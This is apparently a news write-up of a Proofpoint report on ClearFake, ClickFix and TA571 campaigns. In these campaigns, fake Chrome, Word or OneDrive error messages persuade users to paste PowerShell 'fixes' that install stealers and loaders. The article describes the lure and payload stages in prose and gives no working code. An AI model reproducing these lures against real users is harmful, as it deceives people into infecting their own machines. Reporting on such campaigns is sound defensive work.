This campaign involves several cyber threat groups, including ClearFake and others like ClickFix and TA571. ClearFake has previously used tricks where websites ask users to update their browser, but the update actually installs malware.
In the latest attacks, cybercriminals use JavaScript in email attachments or hacked websites. They show fake error messages that look like they're from Google Chrome, Word, or OneDrive. These messages tell users to click a button to copy a PowerShell "fix" onto their computer. They're then told to run this script in a special Windows tool called PowerShell.
Even though these attacks need users to do several things to work, the trickery is clever enough to make people think there's a real problem that needs fixing. This might make users act quickly without thinking about the dangers, according to a report from ProofPoint.
The malware that ProofPoint found includes DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a tool that steals from clipboards, and Lumma Stealer.
ProofPoint experts saw three types of attacks, each starting differently. Only the first one isn't clearly linked to TA571. In this case, linked to ClearFake, users visit a website that's been tampered with. It loads a bad script from the blockchain using Binance's Smart Chain contracts.
This script checks things and then shows a false warning from Google Chrome. It says there's a problem showing a web page. The message asks the visitor to install a "root certificate." They do this by copying a PowerShell script to their Windows Clipboard and running it in a special version of PowerShell made for administrators.
Source: Proofpoint
When the PowerShell script is executed, it will perform
various steps to confirm the device is a valid target, and then it will
download additional payloads, as outlined below.
·
Flushes the DNS cache.
·
Removes clipboard content.
·
Displays a decoy message.
Downloads another remote PowerShell script, which performs anti-VM checks before downloading an info-stealer.
Source: Proofpoint
The second way attackers operate is linked to the 'ClickFix' plan. They modify websites that have been hacked. This change puts a frame over a fake Google Chrome error message.
People are told to open "Windows PowerShell (Admin)" and paste in the code given. This leads to the same bad programs as mentioned before.
Next, an email attack uses HTML attachments that look like Microsoft Word files. It asks users to add the "Word Online" extension to view the document correctly.
The error message gives options like "How to fix" and "Auto-fix". Choosing "How to fix" copies a special code to the computer's clipboard. It tells the user to paste this into PowerShell.
"Auto-fix" uses a special protocol called search-ms to show a file from the internet. This file is on a remote computer controlled by the attacker. It could be named "fix.msi" or "fix.vbs".
Source: Proofpoint
In these situations, the PowerShell commands download and run either an MSI file or a VBS script. This results in infections by Matanbuchus or DarkGate.
In all situations, the attackers rely on the fact that people may not realize the dangers of running PowerShell commands on their computers.
They also use the fact that Windows doesn't always catch and stop the harmful actions started by the pasted code.
These various attack methods demonstrate that TA571 is trying out different ways to be more effective and discover more ways to infect more computers.